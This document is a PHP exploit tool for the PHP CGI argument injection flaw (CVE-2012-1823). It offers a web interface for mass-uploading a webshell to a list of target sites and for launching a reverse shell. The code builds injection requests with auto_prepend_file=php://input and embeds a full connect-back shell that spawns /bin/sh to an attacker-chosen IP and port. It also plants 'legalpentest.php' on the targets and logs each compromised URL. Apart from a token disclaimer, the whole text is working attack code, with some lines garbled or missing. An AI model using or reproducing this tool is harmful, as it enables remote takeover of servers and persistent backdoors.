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PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version


######################################### www.bugreport.ir ########################################
# Title: PHP CGI Argument Injection Remote Exploit V0.3 - PHP Version
# Vendor:                 http://www.php.net
# Vulnerable Version:     PHP up to version 5.3.12 and 5.4.2
# Exploitation:           Remote
# Original Advisory: http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
# Original Exploit URL:   http://www.bugreport.ir/79/exploit.htm
# CVE:                    CVE-2012-1823
# Coded By:               Mostafa Azizi (admin[@]0-Day[dot]net)

/* This tool may be used for legal purposes only. Users take full responsibility for any actions performed using this tool. The author accepts no liability for damage caused by this tool. If these terms are not acceptable to you, then do not use this tool.*/

ini_set("default_socket_timeout", 10);
ob_implicit_flush (1);

<title>PHP CGI Argument Injection Remote Exploit</title>
<p align="center"><font size="4" color="#5E767E">PHP CGI Argument Injection</font></p> <p align="center"><font size="3" color="#4E8975">Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)</font></p>
<body bgcolor="#00000">
<table align="center" border="5">
<th><p align="center"><font size="4" color="#8BB381">Mass File Uploader</font></p>
<th><p align="center"><font size="4" color="#8BB381">Reverse Shell</font></p>
<td><form name="form1" action="'.$SERVER[PHP_SELF].'" enctype="multipart/form-data" method="post">
<p></font><font color="#FFF8C6" >Please specify a file to scan: </font></br><input type="file" name="listfile" size="40"><font color="#FF0000"> * </font> <p></font><font color="#FFF8C6" >Please specify a file to upload: </font></br><input type="file" name="datafile" size="40"><font color="#FF0000"> * </font> <p><font color="#FFF8C6" > specify a port (default is 80): </font></br><input name="port" size="20"><span class="Stile5"></span></p> <p><font color="#FFF8C6" > Proxy (ip:port): </font></br><input name="proxy" size="20"><span class="Stile5"></span></p> <p align="center"> <span class="Stile5"><font color="#FF0000">* </font><font color="white" >fields are required</font></font></span></p>
<p align="center"><input type="submit" value="Start Attack" name="Submit"></p>
        </form> </td>
<td><form name="form1" action="'.$SERVER[PHP_SELF].'" enctype="multipart/form-data" method="post">
<p></font><font color="#FFF8C6" > hostname (ex: www.sitename.com):</font></br><input name="host" size="20"> <span class="Stile5"></span></p> <p></font><font color="#FFF8C6" > Your IP (ex: ): </font></br><input name="lip" size="20"> <span class="Stile5"></span></p> <p><font color="#FFF8C6" > Your Port (ex: 80):</font></br><input name="lport" size="20"> <span class="Stile5"></span></p>
<p align="center"> <span class="Stile5"><font color="#FF0000">All </font><font color="white" >fields are required</font></font></span></p>
<p align="center"><input type="submit" value="Start Attack" name="Submit2"></p>
        </form> </td>
<table width="90%">
      <td width="43%" align="left">


  $host    = $_POST['host'];
  $lip     = $_POST['lip'];
  $lport   = $_POST['lport'];
  $port    = $_POST['port'];
  $proxy   = $_POST['proxy'];
  $list    = file($_FILES['listfile']['tmp_name']);
$file = base64_encode(gzdeflate(file_get_contents($_FILES['datafile']['tmp_name'])));
  $shell   = "gzinflate(base64_decode(\"$file\"))";

if (isset($_POST['Submit2']) && $host != '' && $lip != '' && $lport != '')
        /*pentestmonkey's php-reverse-shell.
Limitations: proc_open and stream_set_blocking require PHP version 4.3+, or 5+ */

                                    /* Connect Back */

$payload = "<?php set_time_limit (0); \$VERSION = \"1.0\"; \$ip = '$lip'; \$port = $lport; \$chunk_size = 1400; \$write_a = null; \$error_a = null; \$shell = 'uname -a; w; id; /bin/sh -i'; \$daemon = 0;\$debug = 0; if (function_exists('pcntl_fork')) { \$pid = pcntl_fork(); if (\$pid == -1) { printit(\"ERROR: Can't fork\"); exit(1);} if (\$pid) { exit(0);} if (posix_setsid() == -1) { printit(\"Error: Can't setsid()\"); exit(1); } \$daemon = 1;} else { printit(\"WARNING: Failed to daemonise. This is quite common and not fatal.\");}chdir(\"/\"); umask(0); \$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);if (!\$sock) { printit(\"\$errstr (\$errno)\"); exit(1);} \$descriptorspec = array(0 => array(\"pipe\", \"r\"),1 => array(\"pipe\", \"w\"), 2 => array(\"pipe\", \"w\"));\$process = proc_open(\$shell, \$descriptorspec, \$pipes);if (!is_resource(\$process)) { printit(\"ERROR: Can't spawn shell\"); exit(1);}stream_set_blocking(\$pipes[0], 0);stream_set_blocking(\$pipes[1], 0);stream_set_blocking(\$pipes[2], 0);stream_set_blocking(\$sock, 0);printit(\"Successfully opened reverse shell to \$ip:\$port\"); while (1) { if (feof(\$sock)) { printit(\"ERROR: Shell connection terminated\"); break;} if (feof(\$pipes[1])) {printit(\"ERROR: Shell process terminated\");break;}\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);if (in_array(\$sock, \$read_a)) {if (\$debug) printit(\"SOCK READ\");\$input = fread(\$sock, \$chunk_size);if(\$debug) printit(\"SOCK: \$input\");fwrite(\$pipes[0], \$input);}if (in_array(\$pipes[1], \$read_a)) {if (\$debug) printit(\"STDOUT READ\");\$input = fread(\$pipes[1], \$chunk_size);if (\$debug) printit(\"STDOUT: \$input\");fwrite(\$sock, \$input);}if (in_array(\$pipes[2], \$read_a)) {if (\$debug) printit(\"STDERR READ\");\$input = fread(\$pipes[2], \$chunk_size); if (\$debug) printit(\"STDERR: \$input\");fwrite(\$sock, \$input);}}fclose(\$sock);fclose(\$pipes[0]);fclose(\$pipes[1]);fclose(\$pipes[2]);proc_close(\$process);function printit (\$string) {if (!\$daemon) {print \"\$string\n\";}} ?>"; $packet = "POST ".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1\r\n";
        $packet .= "Host: ".$host."\r\n";
        $packet .= "User-Agent: PHP CGI Argument Injection Exploiter\r\n";
        $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $packet .= "Content-Length: ".strlen($payload)."\r\n\r\n";
        $packet .= $payload."\r\n\r\n\r\n\r\n";

}elseif (isset($_POST['Submit']) && $list != '' && $file != '')
    if ($port=='') {$port=80;}

        for ($n =0; $n < count($list); $n++)

        $siteAddbackup = $list[$n];
preg_match('/^(?:(?:http|https):\/\/)?[^\/]+(\/.+\/)[^\/\.]+\.[^\/\.]+$/i',$siteAddbackup, $match);
                $path = $match[1];
                $pa  = strstr(trim($siteAdd),$path);
                if ($path ==''){$path = "/"; }
        if ($proxy=='') {$p=$path;} else {$p='http://'.$host.$path;}

/* Checking Availability */

                $connection = fsockopen($host,$port);
                if (!$connection)
            // site is down
echo '<font color=red> No response from '.htmlentities($host).' ...<br></font>'; file_put_contents(realpath(dirname(__FILE__)).'/notconnected.txt', $siteAddbackup."\r\n", FILE_APPEND);
            // site is up


Function Exploitable($host,$path,$p)
    global $html;
                                              /* Checking Exploitability */
        $packet  = "GET ".$p."?-s HTTP/1.1\r\n";
        $packet .= "Host: ".$host."\r\n";
        $packet .= "User-Agent: PHP CGI Argument Injection Exploiter \r\n\r\n";
        $str = array(
                foreach ($str as $value => $search){
                        if(stristr($html, $search) == TRUE)
        case 0:
        echo '<font color=red>'.$host.' Faild!<br></font>';
        case 2:
        echo '<font color=#FFF8C6>'.$host.' Exploitable<br></font>';

Function Exploit($host,$path,$p)
global $html, $shell;
                                            /* Exploiting */

$payload = "<?php \$myFile = \"legalpentest.php\"; \$filehandle = fopen(\$myFile, 'w') or die(\"can't open file\"); \$Data=$shell; fwrite(\$filehandle, \$Data);fclose(\$filehandle);"; $packet = "POST ".$p."/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1\r\n";
        $packet .= "Host: ".$host."\r\n";
        $packet .= "User-Agent: PHP CGI Argument Injection Exploiter\r\n";
        $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $packet .= "Content-Length: ".strlen($payload)."\r\n\r\n";
        $packet .= $payload."\r\n\r\n\r\n\r\n";
/* Check for successfully uploaded */
        $packet  = "HEAD ".$p."/legalpentest.php HTTP/1.1\r\n";
        $packet .= "Host: ".$host."\r\n";
        $packet .= "User-Agent: :) \r\n\r\n";

        if(stristr($html , '404 Not Found') == true)
echo '<font color=#FFF8C6><br>Exploit Faild...<br>-------------------------------------------------------<br></font>';
                else {
echo "<font color=#FFF8C6><br>Exploit Succeeded...<br>http://$host$path"."/legalpentest.php<br>-------------------------------------------------------<br></font>"; file_put_contents(realpath(dirname(__FILE__)).'/shell.txt', "http://$host$path"."/legalpentest.php\r\n";, FILE_APPEND);

function sendpacket($packet,$response = 0,$output = 0,$s=0)
    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
    global $proxy, $host, $port, $html, $user, $pass;
    if ($proxy == '')
        $ock = fsockopen($host,$port);
        stream_set_timeout($ock, 5);
        if (!$ock)
            echo 'No response from '.htmlentities($host).' ...<br>';
        stream_set_timeout($ock, 4);
    } else
        $parts = explode(':',$proxy);
// echo '<font color=white>Connecting to proxy: '.$parts[0].':'.$parts[1].' ...<br><br/></font>';
        $ock   = fsockopen($parts[0],$parts[1]);
        stream_set_timeout($ock, 5);
        if (!$ock)
            echo 'No response from proxy...<br>';

            if ($ock)
                if ($response == 1)
                    if ($proxy == '')
                        $html = '';
                        while (!feof($ock))
                            $html .= fgets($ock);
                    } else
                        $html = '';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
                            $html .= fread($ock,1);
                } else $html = '';
